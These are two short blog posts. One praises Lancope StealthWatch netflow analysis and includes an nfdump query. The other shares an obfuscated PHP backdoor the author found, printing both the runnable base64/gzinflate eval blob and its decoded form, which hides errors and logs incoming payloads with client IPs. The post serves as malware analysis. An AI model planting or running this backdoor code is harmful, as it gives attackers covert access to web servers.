Lancope stealthwatch

Had a nice meeting yesterday with Cisco and some guys from Lanecope. Must say that stealthwatch seems like a really great product. What their product does is that is collects all flows (and more). Sums it up so you can drill down via connections. Basically it does something like this on your netflow data ~$ nfdump -R /var/cache/nfdump/data/asr0/nfcapd.201302281130:asr1/nfcapd.201302281133 -o long 'dst host 77.66.32.1'|head -10 Date flow start Duration Proto Src IP Addr:Port Dst IP Addr:Port Flags Tos Packets Bytes Flows 2013-02-28 11:29:58.


PHP backdoor

Found this little thing on FB tonight. <?php eval(gzinflate(base64_decode("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"))); ?> After unrolling the endless loops it turns out to be <? @error_reporting(0); @ini_set("display_errors",0); @ini_set("log_errors",0); @ini_set("error_log",0); if (isset($_GET['r'])) { print $_GET['r']; } elseif (isset($_POST['e'])) { print(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); } elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') { $data = file_get_contents('php://input'); if (strlen($data) > 0) print 'STATUS-IMPORT-OK'; if (strlen($data) > 12) { $fp=@fopen('tmpfile','a'); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); } } exit;?> a backdoor